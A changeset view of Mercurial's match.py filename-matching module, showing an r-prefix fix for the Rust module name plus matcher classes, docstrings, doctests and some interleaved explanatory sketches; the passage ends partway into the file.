py3: do not convert rust module/attribute names to bytes...
Yuya Nishihara
r43011:9c589dde default draft
@@ -1,1526 +1,1526 b''
1 1 # match.py - filename matching
2 2 #
3 3 # Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import, print_function
9 9
10 10 import copy
11 11 import itertools
12 12 import os
13 13 import re
14 14
15 15 from .i18n import _
16 16 from . import (
17 17 encoding,
18 18 error,
19 19 pathutil,
20 20 policy,
21 21 pycompat,
22 22 util,
23 23 )
24 24 from .utils import (
25 25 stringutil,
26 26 )
27 27
28 rustmod = policy.importrust('filepatterns')
28 rustmod = policy.importrust(r'filepatterns')
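# The r prefix matters here: on Python 3, Mercurial's source transformer
# rewrites unprefixed string literals to bytes, while the import machinery
# needs the Rust module name as a native str.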
29 29
30 30 allpatternkinds = ('re', 'glob', 'path', 'relglob', 'relpath', 'relre',
31 31 'rootglob',
32 32 'listfile', 'listfile0', 'set', 'include', 'subinclude',
33 33 'rootfilesin')
34 34 cwdrelativepatternkinds = ('relpath', 'glob')
35 35
36 36 propertycache = util.propertycache
37 37
38 38 def _rematcher(regex):
39 39 '''compile the regexp with the best available regexp engine and return a
40 40 matcher function'''
41 41 m = util.re.compile(regex)
42 42 try:
43 43 # slightly faster, provided by facebook's re2 bindings
44 44 return m.test_match
45 45 except AttributeError:
46 46 return m.match
47 47
48 48 def _expandsets(kindpats, ctx=None, listsubrepos=False, badfn=None):
49 49 '''Returns the kindpats list with the 'set' patterns expanded to matchers'''
50 50 matchers = []
51 51 other = []
52 52
53 53 for kind, pat, source in kindpats:
54 54 if kind == 'set':
55 55 if ctx is None:
56 56 raise error.ProgrammingError("fileset expression with no "
57 57 "context")
58 58 matchers.append(ctx.matchfileset(pat, badfn=badfn))
59 59
60 60 if listsubrepos:
61 61 for subpath in ctx.substate:
62 62 sm = ctx.sub(subpath).matchfileset(pat, badfn=badfn)
63 63 pm = prefixdirmatcher(subpath, sm, badfn=badfn)
64 64 matchers.append(pm)
65 65
66 66 continue
67 67 other.append((kind, pat, source))
68 68 return matchers, other
69 69
70 70 def _expandsubinclude(kindpats, root):
71 71 '''Returns the list of subinclude matcher args and the kindpats without the
72 72 subincludes in it.'''
73 73 relmatchers = []
74 74 other = []
75 75
76 76 for kind, pat, source in kindpats:
77 77 if kind == 'subinclude':
78 78 sourceroot = pathutil.dirname(util.normpath(source))
79 79 pat = util.pconvert(pat)
80 80 path = pathutil.join(sourceroot, pat)
81 81
82 82 newroot = pathutil.dirname(path)
83 83 matcherargs = (newroot, '', [], ['include:%s' % path])
84 84
85 85 prefix = pathutil.canonpath(root, root, newroot)
86 86 if prefix:
87 87 prefix += '/'
88 88 relmatchers.append((prefix, matcherargs))
89 89 else:
90 90 other.append((kind, pat, source))
91 91
92 92 return relmatchers, other
93 93
94 94 def _kindpatsalwaysmatch(kindpats):
95 95 """"Checks whether the kindspats match everything, as e.g.
96 96 'relpath:.' does.
97 97 """
98 98 for kind, pat, source in kindpats:
99 99 if pat != '' or kind not in ['relpath', 'glob']:
100 100 return False
101 101 return True
102 102
103 103 def _buildkindpatsmatcher(matchercls, root, kindpats, ctx=None,
104 104 listsubrepos=False, badfn=None):
105 105 matchers = []
106 106 fms, kindpats = _expandsets(kindpats, ctx=ctx,
107 107 listsubrepos=listsubrepos, badfn=badfn)
108 108 if kindpats:
109 109 m = matchercls(root, kindpats, badfn=badfn)
110 110 matchers.append(m)
111 111 if fms:
112 112 matchers.extend(fms)
113 113 if not matchers:
114 114 return nevermatcher(badfn=badfn)
115 115 if len(matchers) == 1:
116 116 return matchers[0]
117 117 return unionmatcher(matchers)
118 118
119 119 def match(root, cwd, patterns=None, include=None, exclude=None, default='glob',
120 120 auditor=None, ctx=None, listsubrepos=False, warn=None,
121 121 badfn=None, icasefs=False):
122 122 r"""build an object to match a set of file patterns
123 123
124 124 arguments:
125 125 root - the canonical root of the tree you're matching against
126 126 cwd - the current working directory, if relevant
127 127 patterns - patterns to find
128 128 include - patterns to include (unless they are excluded)
129 129 exclude - patterns to exclude (even if they are included)
130 130 default - if a pattern in patterns has no explicit type, assume this one
131 131 auditor - optional path auditor
132 132 ctx - optional changecontext
133 133 listsubrepos - if True, recurse into subrepositories
134 134 warn - optional function used for printing warnings
135 135 badfn - optional bad() callback for this matcher instead of the default
136 136 icasefs - make a matcher for wdir on case insensitive filesystems, which
137 137 normalizes the given patterns to the case in the filesystem
138 138
139 139 a pattern is one of:
140 140 'glob:<glob>' - a glob relative to cwd
141 141 're:<regexp>' - a regular expression
142 142 'path:<path>' - a path relative to repository root, which is matched
143 143 recursively
144 144 'rootfilesin:<path>' - a path relative to repository root, which is
145 145 matched non-recursively (will not match subdirectories)
146 146 'relglob:<glob>' - an unrooted glob (*.c matches C files in all dirs)
147 147 'relpath:<path>' - a path relative to cwd
148 148 'relre:<regexp>' - a regexp that needn't match the start of a name
149 149 'set:<fileset>' - a fileset expression
150 150 'include:<path>' - a file of patterns to read and include
151 151 'subinclude:<path>' - a file of patterns to match against files under
152 152 the same directory
153 153 '<something>' - a pattern of the specified default type
154 154
155 155 Usually a patternmatcher is returned:
156 156 >>> match(b'foo', b'.', [b're:.*\.c$', b'path:foo/a', b'*.py'])
157 157 <patternmatcher patterns='.*\\.c$|foo/a(?:/|$)|[^/]*\\.py$'>
158 158
159 159 Combining 'patterns' with 'include' (resp. 'exclude') gives an
160 160 intersectionmatcher (resp. a differencematcher):
161 161 >>> type(match(b'foo', b'.', [b're:.*\.c$'], include=[b'path:lib']))
162 162 <class 'mercurial.match.intersectionmatcher'>
163 163 >>> type(match(b'foo', b'.', [b're:.*\.c$'], exclude=[b'path:build']))
164 164 <class 'mercurial.match.differencematcher'>
165 165
166 166 Notice that, if 'patterns' is empty, an alwaysmatcher is returned:
167 167 >>> match(b'foo', b'.', [])
168 168 <alwaysmatcher>
169 169
170 170 The 'default' argument determines which kind of pattern is assumed if a
171 171 pattern has no prefix:
172 172 >>> match(b'foo', b'.', [b'.*\.c$'], default=b're')
173 173 <patternmatcher patterns='.*\\.c$'>
174 174 >>> match(b'foo', b'.', [b'main.py'], default=b'relpath')
175 175 <patternmatcher patterns='main\\.py(?:/|$)'>
176 176 >>> match(b'foo', b'.', [b'main.py'], default=b're')
177 177 <patternmatcher patterns='main.py'>
178 178
179 179 The primary use of matchers is to check whether a value (usually a file
180 180 name) matches against one of the patterns given at initialization. There
181 181 are two ways of doing this check.
182 182
183 183 >>> m = match(b'foo', b'', [b're:.*\.c$', b'relpath:a'])
184 184
185 185 1. Calling the matcher with a file name returns True if any pattern
186 186 matches that file name:
187 187 >>> m(b'a')
188 188 True
189 189 >>> m(b'main.c')
190 190 True
191 191 >>> m(b'test.py')
192 192 False
193 193
194 194 2. Using the exact() method only returns True if the file name matches one
195 195 of the exact patterns (i.e. not re: or glob: patterns):
196 196 >>> m.exact(b'a')
197 197 True
198 198 >>> m.exact(b'main.c')
199 199 False
200 200 """
201 201 normalize = _donormalize
202 202 if icasefs:
203 203 dirstate = ctx.repo().dirstate
204 204 dsnormalize = dirstate.normalize
205 205
206 206 def normalize(patterns, default, root, cwd, auditor, warn):
207 207 kp = _donormalize(patterns, default, root, cwd, auditor, warn)
208 208 kindpats = []
209 209 for kind, pats, source in kp:
210 210 if kind not in ('re', 'relre'): # regex can't be normalized
211 211 p = pats
212 212 pats = dsnormalize(pats)
213 213
214 214 # Preserve the original to handle a case only rename.
215 215 if p != pats and p in dirstate:
216 216 kindpats.append((kind, p, source))
217 217
218 218 kindpats.append((kind, pats, source))
219 219 return kindpats
220 220
221 221 if patterns:
222 222 kindpats = normalize(patterns, default, root, cwd, auditor, warn)
223 223 if _kindpatsalwaysmatch(kindpats):
224 224 m = alwaysmatcher(badfn)
225 225 else:
226 226 m = _buildkindpatsmatcher(patternmatcher, root, kindpats, ctx=ctx,
227 227 listsubrepos=listsubrepos, badfn=badfn)
228 228 else:
229 229 # It's a little strange that no patterns means to match everything.
230 230 # Consider changing this to match nothing (probably using nevermatcher).
231 231 m = alwaysmatcher(badfn)
232 232
233 233 if include:
234 234 kindpats = normalize(include, 'glob', root, cwd, auditor, warn)
235 235 im = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
236 236 listsubrepos=listsubrepos, badfn=None)
237 237 m = intersectmatchers(m, im)
238 238 if exclude:
239 239 kindpats = normalize(exclude, 'glob', root, cwd, auditor, warn)
240 240 em = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
241 241 listsubrepos=listsubrepos, badfn=None)
242 242 m = differencematcher(m, em)
243 243 return m
244 244
245 245 def exact(files, badfn=None):
246 246 return exactmatcher(files, badfn=badfn)
247 247
248 248 def always(badfn=None):
249 249 return alwaysmatcher(badfn)
250 250
251 251 def never(badfn=None):
252 252 return nevermatcher(badfn)
253 253
254 254 def badmatch(match, badfn):
255 255 """Make a copy of the given matcher, replacing its bad method with the given
256 256 one.
257 257 """
258 258 m = copy.copy(match)
259 259 m.bad = badfn
260 260 return m
261 261
262 262 def _donormalize(patterns, default, root, cwd, auditor=None, warn=None):
263 263 '''Convert 'kind:pat' from the patterns list to tuples with kind and
264 264 normalized and rooted patterns and with listfiles expanded.'''
265 265 kindpats = []
266 266 for kind, pat in [_patsplit(p, default) for p in patterns]:
267 267 if kind in cwdrelativepatternkinds:
268 268 pat = pathutil.canonpath(root, cwd, pat, auditor=auditor)
269 269 elif kind in ('relglob', 'path', 'rootfilesin', 'rootglob'):
270 270 pat = util.normpath(pat)
271 271 elif kind in ('listfile', 'listfile0'):
272 272 try:
273 273 files = util.readfile(pat)
274 274 if kind == 'listfile0':
275 275 files = files.split('\0')
276 276 else:
277 277 files = files.splitlines()
278 278 files = [f for f in files if f]
279 279 except EnvironmentError:
280 280 raise error.Abort(_("unable to read file list (%s)") % pat)
281 281 for k, p, source in _donormalize(files, default, root, cwd,
282 282 auditor, warn):
283 283 kindpats.append((k, p, pat))
284 284 continue
285 285 elif kind == 'include':
286 286 try:
287 287 fullpath = os.path.join(root, util.localpath(pat))
288 288 includepats = readpatternfile(fullpath, warn)
289 289 for k, p, source in _donormalize(includepats, default,
290 290 root, cwd, auditor, warn):
291 291 kindpats.append((k, p, source or pat))
292 292 except error.Abort as inst:
293 293 raise error.Abort('%s: %s' % (pat, inst[0]))
294 294 except IOError as inst:
295 295 if warn:
296 296 warn(_("skipping unreadable pattern file '%s': %s\n") %
297 297 (pat, stringutil.forcebytestr(inst.strerror)))
298 298 continue
299 299 # else: re or relre - which cannot be normalized
300 300 kindpats.append((kind, pat, ''))
301 301 return kindpats
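
A minimal sketch of what _donormalize produces, for kinds that need no
filesystem access (cwd-relative kinds such as 'glob' and 'relpath' would go
through pathutil.canonpath instead):

>>> _donormalize([b're:.*\.c$', b'relglob:*.h'], b'glob', b'', b'', None, None)
[('re', '.*\\.c$', ''), ('relglob', '*.h', '')]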
302 302
303 303 class basematcher(object):
304 304
305 305 def __init__(self, badfn=None):
306 306 if badfn is not None:
307 307 self.bad = badfn
308 308
309 309 def __call__(self, fn):
310 310 return self.matchfn(fn)
311 311 # Callbacks related to how the matcher is used by dirstate.walk.
312 312 # Subscribers to these events must monkeypatch the matcher object.
313 313 def bad(self, f, msg):
314 314 '''Callback from dirstate.walk for each explicit file that can't be
315 315 found/accessed, with an error message.'''
316 316
317 317 # If explicitdir is set, it will be called when an explicitly listed
318 318 # directory is visited.
319 319 explicitdir = None
320 320
321 321 # If traversedir is set, it will be called when a directory discovered
322 322 # by recursive traversal is visited.
323 323 traversedir = None
324 324
325 325 @propertycache
326 326 def _files(self):
327 327 return []
328 328
329 329 def files(self):
330 330 '''Explicitly listed files or patterns or roots:
331 331 if no patterns or .always(): empty list,
332 332 if exact: list exact files,
333 333 if not .anypats(): list all files and dirs,
334 334 else: optimal roots'''
335 335 return self._files
336 336
337 337 @propertycache
338 338 def _fileset(self):
339 339 return set(self._files)
340 340
341 341 def exact(self, f):
342 342 '''Returns True if f is in .files().'''
343 343 return f in self._fileset
344 344
345 345 def matchfn(self, f):
346 346 return False
347 347
348 348 def visitdir(self, dir):
349 349 '''Decides whether a directory should be visited based on whether it
350 350 has potential matches in it or one of its subdirectories. This is
351 351 based on the match's primary, included, and excluded patterns.
352 352
353 353 Returns the string 'all' if the given directory and all subdirectories
354 354 should be visited. Otherwise returns True or False indicating whether
355 355 the given directory should be visited.
356 356 '''
357 357 return True
358 358
359 359 def visitchildrenset(self, dir):
360 360 '''Decides whether a directory should be visited based on whether it
361 361 has potential matches in it or one of its subdirectories, and
362 362 potentially lists which subdirectories of that directory should be
363 363 visited. This is based on the match's primary, included, and excluded
364 364 patterns.
365 365
366 366 This function is very similar to 'visitdir', and the following mapping
367 367 can be applied:
368 368
369 369 visitdir | visitchildrenset
370 370 ----------+-------------------
371 371 False | set()
372 372 'all' | 'all'
373 373 True | 'this' OR non-empty set of subdirs -or files- to visit
374 374
375 375 Example:
376 376 Assume matchers ['path:foo/bar', 'rootfilesin:qux'], we would return
377 377 the following values (assuming the implementation of visitchildrenset
378 378 is capable of recognizing this; some implementations are not).
379 379
380 380 '' -> {'foo', 'qux'}
381 381 'baz' -> set()
382 382 'foo' -> {'bar'}
383 383 # Ideally this would be 'all', but since the prefix nature of matchers
384 384 # is applied to the entire matcher, we have to downgrade this to
385 385 # 'this' due to the non-prefix 'rootfilesin'-kind matcher being mixed
386 386 # in.
387 387 'foo/bar' -> 'this'
388 388 'qux' -> 'this'
389 389
390 390 Important:
391 391 Most matchers do not know if they're representing files or
392 392 directories. They see ['path:dir/f'] and don't know whether 'f' is a
393 393 file or a directory, so visitchildrenset('dir') for most matchers will
394 394 return {'f'}, but if the matcher knows it's a file (like exactmatcher
395 395 does), it may return 'this'. Do not rely on a set return value meaning
396 396 that there are no files in this dir to investigate (or, equivalently,
397 397 that 'this' is always returned when there are files in 'dir' to
398 398 investigate).
399 399 '''
400 400 return 'this'
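
The worked example above can be reproduced with the includematcher defined
below (a sketch; the empty root is arbitrary):

>>> im = includematcher(b'', [(b'path', b'foo/bar', b''),
...                           (b'rootfilesin', b'qux', b'')])
>>> sorted(im.visitchildrenset(b''))
['foo', 'qux']
>>> sorted(im.visitchildrenset(b'baz'))
[]
>>> sorted(im.visitchildrenset(b'foo'))
['bar']
>>> im.visitchildrenset(b'foo/bar')
'this'
>>> im.visitchildrenset(b'qux')
'this'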
401 401
402 402 def always(self):
403 403 '''Matcher will match everything and .files() will be empty --
404 404 optimization might be possible.'''
405 405 return False
406 406
407 407 def isexact(self):
408 408 '''Matcher will match exactly the list of files in .files() --
409 409 optimization might be possible.'''
410 410 return False
411 411
412 412 def prefix(self):
413 413 '''Matcher will match the paths in .files() recursively --
414 414 optimization might be possible.'''
415 415 return False
416 416
417 417 def anypats(self):
418 418 '''None of .always(), .isexact(), and .prefix() is true --
419 419 optimizations will be difficult.'''
420 420 return not self.always() and not self.isexact() and not self.prefix()
421 421
422 422 class alwaysmatcher(basematcher):
423 423 '''Matches everything.'''
424 424
425 425 def __init__(self, badfn=None):
426 426 super(alwaysmatcher, self).__init__(badfn)
427 427
428 428 def always(self):
429 429 return True
430 430
431 431 def matchfn(self, f):
432 432 return True
433 433
434 434 def visitdir(self, dir):
435 435 return 'all'
436 436
437 437 def visitchildrenset(self, dir):
438 438 return 'all'
439 439
440 440 def __repr__(self):
441 441 return r'<alwaysmatcher>'
442 442
443 443 class nevermatcher(basematcher):
444 444 '''Matches nothing.'''
445 445
446 446 def __init__(self, badfn=None):
447 447 super(nevermatcher, self).__init__(badfn)
448 448
449 449 # It's a little weird to say that the nevermatcher is an exact matcher
450 450 # or a prefix matcher, but it seems to make sense to let callers take
451 451 # fast paths based on either. There will be no exact matches, nor any
452 452 # prefixes (files() returns []), so fast paths iterating over them should
453 453 # be efficient (and correct).
454 454 def isexact(self):
455 455 return True
456 456
457 457 def prefix(self):
458 458 return True
459 459
460 460 def visitdir(self, dir):
461 461 return False
462 462
463 463 def visitchildrenset(self, dir):
464 464 return set()
465 465
466 466 def __repr__(self):
467 467 return r'<nevermatcher>'
468 468
469 469 class predicatematcher(basematcher):
470 470 """A matcher adapter for a simple boolean function"""
471 471
472 472 def __init__(self, predfn, predrepr=None, badfn=None):
473 473 super(predicatematcher, self).__init__(badfn)
474 474 self.matchfn = predfn
475 475 self._predrepr = predrepr
476 476
477 477 @encoding.strmethod
478 478 def __repr__(self):
479 479 s = (stringutil.buildrepr(self._predrepr)
480 480 or pycompat.byterepr(self.matchfn))
481 481 return '<predicatematcher pred=%s>' % s
482 482
483 483 def normalizerootdir(dir, funcname):
484 484 if dir == '.':
485 485 util.nouideprecwarn("match.%s() no longer accepts "
486 486 "'.', use '' instead." % funcname, '5.1')
487 487 return ''
488 488 return dir
489 489
490 490
491 491 class patternmatcher(basematcher):
492 492 """Matches a set of (kind, pat, source) against a 'root' directory.
493 493
494 494 >>> kindpats = [
495 495 ... (b're', br'.*\.c$', b''),
496 496 ... (b'path', b'foo/a', b''),
497 497 ... (b'relpath', b'b', b''),
498 498 ... (b'glob', b'*.h', b''),
499 499 ... ]
500 500 >>> m = patternmatcher(b'foo', kindpats)
501 501 >>> m(b'main.c') # matches re:.*\.c$
502 502 True
503 503 >>> m(b'b.txt')
504 504 False
505 505 >>> m(b'foo/a') # matches path:foo/a
506 506 True
507 507 >>> m(b'a') # does not match path:b, since 'root' is 'foo'
508 508 False
509 509 >>> m(b'b') # matches relpath:b, since 'root' is 'foo'
510 510 True
511 511 >>> m(b'lib.h') # matches glob:*.h
512 512 True
513 513
514 514 >>> m.files()
515 515 ['', 'foo/a', 'b', '']
516 516 >>> m.exact(b'foo/a')
517 517 True
518 518 >>> m.exact(b'b')
519 519 True
520 520 >>> m.exact(b'lib.h') # exact matches are for (rel)path kinds
521 521 False
522 522 """
523 523
524 524 def __init__(self, root, kindpats, badfn=None):
525 525 super(patternmatcher, self).__init__(badfn)
526 526
527 527 self._files = _explicitfiles(kindpats)
528 528 self._prefix = _prefix(kindpats)
529 529 self._pats, self.matchfn = _buildmatch(kindpats, '$', root)
530 530
531 531 @propertycache
532 532 def _dirs(self):
533 533 return set(util.dirs(self._fileset))
534 534
535 535 def visitdir(self, dir):
536 536 dir = normalizerootdir(dir, 'visitdir')
537 537 if self._prefix and dir in self._fileset:
538 538 return 'all'
539 539 return (dir in self._fileset or
540 540 dir in self._dirs or
541 541 any(parentdir in self._fileset
542 542 for parentdir in util.finddirs(dir)))
543 543
544 544 def visitchildrenset(self, dir):
545 545 ret = self.visitdir(dir)
546 546 if ret is True:
547 547 return 'this'
548 548 elif not ret:
549 549 return set()
550 550 assert ret == 'all'
551 551 return 'all'
552 552
553 553 def prefix(self):
554 554 return self._prefix
555 555
556 556 @encoding.strmethod
557 557 def __repr__(self):
558 558 return ('<patternmatcher patterns=%r>' % pycompat.bytestr(self._pats))
559 559
560 560 # This is basically a reimplementation of util.dirs that stores the children
561 561 # instead of just a count of them, plus a small optional optimization to avoid
562 562 # some directories we don't need.
563 563 class _dirchildren(object):
564 564 def __init__(self, paths, onlyinclude=None):
565 565 self._dirs = {}
566 566 self._onlyinclude = onlyinclude or []
567 567 addpath = self.addpath
568 568 for f in paths:
569 569 addpath(f)
570 570
571 571 def addpath(self, path):
572 572 if path == '':
573 573 return
574 574 dirs = self._dirs
575 575 findsplitdirs = _dirchildren._findsplitdirs
576 576 for d, b in findsplitdirs(path):
577 577 if d not in self._onlyinclude:
578 578 continue
579 579 dirs.setdefault(d, set()).add(b)
580 580
581 581 @staticmethod
582 582 def _findsplitdirs(path):
583 583 # yields (dirname, basename) tuples, walking back to the root. This is
584 584 # very similar to util.finddirs, except:
585 585 # - produces a (dirname, basename) tuple, not just 'dirname'
586 586 # Unlike manifest._splittopdir, this does not suffix `dirname` with a
587 587 # slash.
588 588 oldpos = len(path)
589 589 pos = path.rfind('/')
590 590 while pos != -1:
591 591 yield path[:pos], path[pos + 1:oldpos]
592 592 oldpos = pos
593 593 pos = path.rfind('/', 0, pos)
594 594 yield '', path[:oldpos]
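
For instance (a small sketch of the walk order):

>>> list(_dirchildren._findsplitdirs(b'a/b/c'))
[('a/b', 'c'), ('a', 'b'), ('', 'a')]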
595 595
596 596 def get(self, path):
597 597 return self._dirs.get(path, set())
598 598
599 599 class includematcher(basematcher):
600 600
601 601 def __init__(self, root, kindpats, badfn=None):
602 602 super(includematcher, self).__init__(badfn)
603 603
604 604 self._pats, self.matchfn = _buildmatch(kindpats, '(?:/|$)', root)
605 605 self._prefix = _prefix(kindpats)
606 606 roots, dirs, parents = _rootsdirsandparents(kindpats)
607 607 # roots are directories which are recursively included.
608 608 self._roots = set(roots)
609 609 # dirs are directories which are non-recursively included.
610 610 self._dirs = set(dirs)
611 611 # parents are directories which are non-recursively included because
612 612 # they are needed to get to items in _dirs or _roots.
613 613 self._parents = parents
614 614
615 615 def visitdir(self, dir):
616 616 dir = normalizerootdir(dir, 'visitdir')
617 617 if self._prefix and dir in self._roots:
618 618 return 'all'
619 619 return (dir in self._roots or
620 620 dir in self._dirs or
621 621 dir in self._parents or
622 622 any(parentdir in self._roots
623 623 for parentdir in util.finddirs(dir)))
624 624
625 625 @propertycache
626 626 def _allparentschildren(self):
627 627 # It may seem odd that we add dirs, roots, and parents, and then
628 628 # restrict to only parents. This is to catch the case of:
629 629 # dirs = ['foo/bar']
630 630 # parents = ['foo']
631 631 # if we asked for the children of 'foo', but had only added
632 632 # self._parents, we wouldn't be able to respond ['bar'].
633 633 return _dirchildren(
634 634 itertools.chain(self._dirs, self._roots, self._parents),
635 635 onlyinclude=self._parents)
636 636
637 637 def visitchildrenset(self, dir):
638 638 if self._prefix and dir in self._roots:
639 639 return 'all'
640 640 # Note: this does *not* include the 'dir in self._parents' case from
641 641 # visitdir, that's handled below.
642 642 if ('' in self._roots or
643 643 dir in self._roots or
644 644 dir in self._dirs or
645 645 any(parentdir in self._roots
646 646 for parentdir in util.finddirs(dir))):
647 647 return 'this'
648 648
649 649 if dir in self._parents:
650 650 return self._allparentschildren.get(dir) or set()
651 651 return set()
652 652
653 653 @encoding.strmethod
654 654 def __repr__(self):
655 655 return ('<includematcher includes=%r>' % pycompat.bytestr(self._pats))
656 656
657 657 class exactmatcher(basematcher):
658 658 r'''Matches the input files exactly. They are interpreted as paths, not
659 659 patterns (so no kind-prefixes).
660 660
661 661 >>> m = exactmatcher([b'a.txt', br're:.*\.c$'])
662 662 >>> m(b'a.txt')
663 663 True
664 664 >>> m(b'b.txt')
665 665 False
666 666
667 667 Input files that would be matched are exactly those returned by .files()
668 668 >>> m.files()
669 669 ['a.txt', 're:.*\\.c$']
670 670
671 671 So the pattern 're:.*\.c$' is not interpreted as a regex, but as a file name
672 672 >>> m(b'main.c')
673 673 False
674 674 >>> m(br're:.*\.c$')
675 675 True
676 676 '''
677 677
678 678 def __init__(self, files, badfn=None):
679 679 super(exactmatcher, self).__init__(badfn)
680 680
681 681 if isinstance(files, list):
682 682 self._files = files
683 683 else:
684 684 self._files = list(files)
685 685
686 686 matchfn = basematcher.exact
687 687
688 688 @propertycache
689 689 def _dirs(self):
690 690 return set(util.dirs(self._fileset))
691 691
692 692 def visitdir(self, dir):
693 693 dir = normalizerootdir(dir, 'visitdir')
694 694 return dir in self._dirs
695 695
696 696 def visitchildrenset(self, dir):
697 697 dir = normalizerootdir(dir, 'visitchildrenset')
698 698
699 699 if not self._fileset or dir not in self._dirs:
700 700 return set()
701 701
702 702 candidates = self._fileset | self._dirs - {''}
703 703 if dir != '':
704 704 d = dir + '/'
705 705 candidates = set(c[len(d):] for c in candidates if
706 706 c.startswith(d))
707 707 # self._dirs includes all of the directories, recursively, so if
708 708 # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo',
709 709 # 'foo/bar' in it. Thus we can safely ignore a candidate that has a
710 710 # '/' in it, indicating it's for a subdir-of-a-subdir; the
711 711 # immediate subdir will be in there without a slash.
712 712 ret = {c for c in candidates if '/' not in c}
713 713 # We really do not expect ret to be empty, since that would imply that
714 714 # there's something in _dirs that didn't have a file in _fileset.
715 715 assert ret
716 716 return ret
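
A sketch of the computation above:

>>> m = exactmatcher([b'a/b/c.txt', b'a/d.txt'])
>>> sorted(m.visitchildrenset(b''))
['a']
>>> sorted(m.visitchildrenset(b'a'))
['b', 'd.txt']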
717 717
718 718 def isexact(self):
719 719 return True
720 720
721 721 @encoding.strmethod
722 722 def __repr__(self):
723 723 return ('<exactmatcher files=%r>' % self._files)
724 724
725 725 class differencematcher(basematcher):
726 726 '''Composes two matchers by matching if the first matches and the second
727 727 does not.
728 728
729 729 The second matcher's non-matching-attributes (bad, explicitdir,
730 730 traversedir) are ignored.
731 731 '''
732 732 def __init__(self, m1, m2):
733 733 super(differencematcher, self).__init__()
734 734 self._m1 = m1
735 735 self._m2 = m2
736 736 self.bad = m1.bad
737 737 self.explicitdir = m1.explicitdir
738 738 self.traversedir = m1.traversedir
739 739
740 740 def matchfn(self, f):
741 741 return self._m1(f) and not self._m2(f)
742 742
743 743 @propertycache
744 744 def _files(self):
745 745 if self.isexact():
746 746 return [f for f in self._m1.files() if self(f)]
747 747 # If m1 is not an exact matcher, we can't easily figure out the set of
748 748 # files, because its files() are not always files. For example, if
749 749 # m1 is "path:dir" and m2 is "rootfilesin:.", we don't
750 750 # want to remove "dir" from the set even though it would match m2,
751 751 # because the "dir" in m1 may not be a file.
752 752 return self._m1.files()
753 753
754 754 def visitdir(self, dir):
755 755 if self._m2.visitdir(dir) == 'all':
756 756 return False
757 757 elif not self._m2.visitdir(dir):
758 758 # m2 does not match dir, we can return 'all' here if possible
759 759 return self._m1.visitdir(dir)
760 760 return bool(self._m1.visitdir(dir))
761 761
762 762 def visitchildrenset(self, dir):
763 763 m2_set = self._m2.visitchildrenset(dir)
764 764 if m2_set == 'all':
765 765 return set()
766 766 m1_set = self._m1.visitchildrenset(dir)
767 767 # Possible values for m1: 'all', 'this', set(...), set()
768 768 # Possible values for m2: 'this', set(...), set()
769 769 # If m2 has nothing under here that we care about, return m1, even if
770 770 # it's 'all'. This is a change in behavior from visitdir, which would
771 771 # return True, not 'all', for some reason.
772 772 if not m2_set:
773 773 return m1_set
774 774 if m1_set in ['all', 'this']:
775 775 # Never return 'all' here if m2_set is any kind of non-empty (either
776 776 # 'this' or set(foo)), since m2 might return set() for a
777 777 # subdirectory.
778 778 return 'this'
779 779 # Possible values for m1: set(...), set()
780 780 # Possible values for m2: 'this', set(...)
781 781 # We ignore m2's set results. They're possibly incorrect:
782 782 # m1 = path:dir/subdir, m2=rootfilesin:dir, visitchildrenset(''):
783 783 # m1 returns {'dir'}, m2 returns {'dir'}, if we subtracted we'd
784 784 # return set(), which is *not* correct, we still need to visit 'dir'!
785 785 return m1_set
786 786
787 787 def isexact(self):
788 788 return self._m1.isexact()
789 789
790 790 @encoding.strmethod
791 791 def __repr__(self):
792 792 return ('<differencematcher m1=%r, m2=%r>' % (self._m1, self._m2))
793 793
794 794 def intersectmatchers(m1, m2):
795 795 '''Composes two matchers by matching if both of them match.
796 796
797 797 The second matcher's non-matching-attributes (bad, explicitdir,
798 798 traversedir) are ignored.
799 799 '''
800 800 if m1 is None or m2 is None:
801 801 return m1 or m2
802 802 if m1.always():
803 803 m = copy.copy(m2)
804 804 # TODO: Consider encapsulating these things in a class so there's only
805 805 # one thing to copy from m1.
806 806 m.bad = m1.bad
807 807 m.explicitdir = m1.explicitdir
808 808 m.traversedir = m1.traversedir
809 809 return m
810 810 if m2.always():
811 811 m = copy.copy(m1)
812 812 return m
813 813 return intersectionmatcher(m1, m2)
814 814
815 815 class intersectionmatcher(basematcher):
816 816 def __init__(self, m1, m2):
817 817 super(intersectionmatcher, self).__init__()
818 818 self._m1 = m1
819 819 self._m2 = m2
820 820 self.bad = m1.bad
821 821 self.explicitdir = m1.explicitdir
822 822 self.traversedir = m1.traversedir
823 823
824 824 @propertycache
825 825 def _files(self):
826 826 if self.isexact():
827 827 m1, m2 = self._m1, self._m2
828 828 if not m1.isexact():
829 829 m1, m2 = m2, m1
830 830 return [f for f in m1.files() if m2(f)]
831 831 # If neither m1 nor m2 is an exact matcher, we can't easily intersect
832 832 # the set of files, because their files() are not always files. For
833 833 # example, if intersecting a matcher "-I glob:foo.txt" with matcher of
834 834 # "path:dir2", we don't want to remove "dir2" from the set.
835 835 return self._m1.files() + self._m2.files()
836 836
837 837 def matchfn(self, f):
838 838 return self._m1(f) and self._m2(f)
839 839
840 840 def visitdir(self, dir):
841 841 visit1 = self._m1.visitdir(dir)
842 842 if visit1 == 'all':
843 843 return self._m2.visitdir(dir)
844 844 # bool() because visit1=True + visit2='all' should not be 'all'
845 845 return bool(visit1 and self._m2.visitdir(dir))
846 846
847 847 def visitchildrenset(self, dir):
848 848 m1_set = self._m1.visitchildrenset(dir)
849 849 if not m1_set:
850 850 return set()
851 851 m2_set = self._m2.visitchildrenset(dir)
852 852 if not m2_set:
853 853 return set()
854 854
855 855 if m1_set == 'all':
856 856 return m2_set
857 857 elif m2_set == 'all':
858 858 return m1_set
859 859
860 860 if m1_set == 'this' or m2_set == 'this':
861 861 return 'this'
862 862
863 863 assert isinstance(m1_set, set) and isinstance(m2_set, set)
864 864 return m1_set.intersection(m2_set)
865 865
866 866 def always(self):
867 867 return self._m1.always() and self._m2.always()
868 868
869 869 def isexact(self):
870 870 return self._m1.isexact() or self._m2.isexact()
871 871
872 872 @encoding.strmethod
873 873 def __repr__(self):
874 874 return ('<intersectionmatcher m1=%r, m2=%r>' % (self._m1, self._m2))
875 875
876 876 class subdirmatcher(basematcher):
877 877 """Adapt a matcher to work on a subdirectory only.
878 878
